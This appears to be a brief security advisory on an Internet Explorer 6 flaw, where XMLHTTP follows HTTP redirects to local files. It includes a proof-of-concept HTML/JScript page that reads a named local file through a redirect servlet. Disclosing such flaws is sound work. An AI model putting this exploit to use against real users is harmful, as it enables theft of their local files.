|
|
|
|
| |
| A bug in the Microsoft.XMLHTTP component shipped with Internet Explorer 6 allows reading and sending local files. The component does not handle HTTP redirects to local files properly. In order for this exploit to work the file name must be known. However, the exploit does not distinguish between extensions, binary or textual content. |
| |
Credit:
The information has been provided by jelmer.
|
| |
Vulnerable systems:
Internet Explorer 6.0
Demonstration:
A demonstration is available at http://www.xs4all.nl/~jkuperus/bug.htm
Example:
(NOTE, the character 'I' has been replaced with an '!')
<html>
<head>
<title>Exploit</title>
<scr!pt language="jscript">
function doIt() {
// open the file on the users harddisk using a http redirect
var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();
alert(xmlhttp.responseText);
}
</script>
</head>
<body>
<button onclick="doIt()">Do it</button>
</body>
</html>
|
|
|
|
|
